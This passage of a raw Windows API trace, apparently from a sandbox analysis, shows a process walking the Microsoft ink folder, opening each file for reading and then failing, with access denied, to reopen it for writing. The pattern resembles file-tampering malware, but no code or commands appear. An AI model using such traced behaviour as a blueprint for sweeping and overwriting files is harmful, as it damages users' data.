RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0100.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0100.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0100.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.852] AreFileApisANSI () returned 1 [0100.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll", lpUsedDefaultChar=0x0) returned 62 [0100.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.852] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.852] AreFileApisANSI () returned 1 [0100.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0100.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll") returned 62 [0100.852] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.852] GetFileType (hFile=0x368) returned 0x1 [0100.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.853] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.853] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.853] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.853] CloseHandle (hObject=0x368) returned 1 [0100.853] AreFileApisANSI () returned 1 [0100.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e140 [0100.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll") returned 62 [0100.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tabskb.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabskb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.854] GetLastError () returned 0x5 [0100.854] GetLastError () returned 0x5 [0100.854] SetLastError (dwErrCode=0x5) [0100.854] GetLastError () returned 0x5 [0100.854] SetLastError (dwErrCode=0x5) [0100.854] GetLastError () returned 0x5 [0100.854] SetLastError (dwErrCode=0x5) [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.854] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x5f780, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="TabTip.exe", cAlternateFileName="")) returned 1 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0100.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0100.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.855] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.855] AreFileApisANSI () returned 1 [0100.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe", lpUsedDefaultChar=0x0) returned 62 [0100.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.855] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.855] AreFileApisANSI () returned 1 [0100.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.855] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe") returned 62 [0100.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.855] GetFileType (hFile=0x368) returned 0x1 [0100.856] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.856] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.856] CloseHandle (hObject=0x368) returned 1 [0100.856] AreFileApisANSI () returned 1 [0100.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.856] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ecf0 [0100.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6ecf0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe") returned 62 [0100.856] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TabTip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabtip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.857] GetLastError () returned 0x5 [0100.857] GetLastError () returned 0x5 [0100.857] SetLastError (dwErrCode=0x5) [0100.857] GetLastError () returned 0x5 [0100.857] SetLastError (dwErrCode=0x5) [0100.857] GetLastError () returned 0x5 [0100.857] SetLastError (dwErrCode=0x5) [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.857] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8602, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="th-TH", cAlternateFileName="")) returned 1 [0100.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0100.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.857] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.857] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.857] AreFileApisANSI () returned 1 [0100.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH", lpUsedDefaultChar=0x0) returned 57 [0100.857] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.858] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.858] AreFileApisANSI () returned 1 [0100.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 57 [0100.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.858] GetLastError () returned 0x5 [0100.858] GetLastError () returned 0x5 [0100.858] SetLastError (dwErrCode=0x5) [0100.858] GetLastError () returned 0x5 [0100.858] SetLastError (dwErrCode=0x5) [0100.858] GetLastError () returned 0x5 [0100.858] SetLastError (dwErrCode=0x5) [0100.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.858] AreFileApisANSI () returned 1 [0100.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH") returned 57 [0100.859] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.859] GetLastError () returned 0x5 [0100.859] GetLastError () returned 0x5 [0100.859] SetLastError (dwErrCode=0x5) [0100.859] GetLastError () returned 0x5 [0100.859] SetLastError (dwErrCode=0x5) [0100.859] GetLastError () returned 0x5 [0100.859] SetLastError (dwErrCode=0x5) [0100.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0100.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0100.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0100.861] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1aad768, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1aad768, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x109400, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="TipRes.dll", cAlternateFileName="")) returned 1 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.861] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft 